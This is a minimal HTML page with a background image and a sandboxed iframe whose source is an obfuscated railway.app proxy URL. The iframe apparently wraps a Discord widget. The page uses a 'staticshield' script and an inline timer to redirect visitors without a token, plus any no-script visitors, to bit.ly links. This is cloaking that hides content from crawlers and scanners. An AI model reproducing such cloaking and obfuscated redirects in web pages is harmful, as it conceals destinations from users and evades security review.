<html>
  <head>
      <style>
          Body  {
            Background-image: url("r17568540283.jpeg");
             background-repeat: no-repeat;
             background-attachment: fixed;
             background-size: cover;
}
           
          
    
          
          
          
          
          
          
      </style>
    <script src='https://staticshield.vercel.app/script.js' data-site-id='2cd95d98-e12a-4c75-a108-8e3f793217f3' data-cap=''></script> <script>setInterval(()=>{window.staticshieldToken||window.location.replace("https://bit.ly/req-blk-ss")},3e3);</script> <style>.staticshield-div { display: none }</style>  <noscript> <meta http-equiv='refresh' content='0' url='https://bit.ly/ss-noscript'/></noscript>
  </head>
  <body>
          <style>
          Body  {
            Background-image: url("r17568540283.jpeg");
             background-repeat: no-repeat;
             background-attachment: fixed;
             background-size: cover;
}
           
          
    
          
          
          
          
          
          
      </style>
    <iframe src="https://westcoast-chill.up.railway.app/service/hvtrs8%2F-dksaopd%2Ccmm-wkdeev%3Fkd%3F12205696337%3B6443862%24tjeoe%3Fdcri" width="350" height="500" allowtransparency="true" frameborder="0" sandbox="allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts"></iframe>
  </body>
  
</html>
